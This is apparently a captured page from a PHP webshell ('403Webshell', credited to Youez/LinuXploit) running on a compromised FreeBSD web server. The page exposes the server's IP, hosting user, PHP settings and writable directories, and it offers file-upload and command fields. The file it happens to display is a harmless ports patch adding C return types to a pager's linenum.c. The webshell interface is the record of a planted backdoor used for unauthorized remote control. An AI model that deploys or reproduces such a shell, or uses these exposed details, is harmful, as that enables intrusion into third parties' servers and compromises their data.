403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/sysutils/44bsd-more/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/sysutils/44bsd-more/files/patch-linenum.c
--- linenum.c.orig	2011-09-08 01:09:35.000000000 +0800
+++ linenum.c	2011-09-08 01:11:21.000000000 +0800
@@ -134,7 +134,7 @@ clr_linenum()
 /*
  * Calculate the gap for an entry.
  */
-static
+static void
 calcgap(p)
 	register struct linenum *p;
 {
@@ -154,6 +154,7 @@ calcgap(p)
  * The specified position (pos) should be the file position of the
  * FIRST character in the specified line.
  */
+void
 add_lnum(line, pos)
 	int line;
 	off_t pos;
@@ -248,7 +249,7 @@ add_lnum(line, pos)
  * If we get stuck in a long loop trying to figure out the
  * line number, print a message to tell the user what we're doing.
  */
-static
+static void
 longloopmessage()
 {
 	ierror("Calculating line numbers");
@@ -264,6 +265,7 @@ longloopmessage()
  * Find the line number associated with a given position.
  * Return 0 if we can't figure it out.
  */
+int
 find_linenum(pos)
 	off_t pos;
 {
@@ -384,6 +386,7 @@ find_linenum(pos)
  * The argument "where" tells which line is to be considered
  * the "current" line (e.g. TOP, BOTTOM, MIDDLE, etc).
  */
+int
 currline(where)
 	int where;
 {

Youez - 2016 - github.com/yon3zu
LinuXploit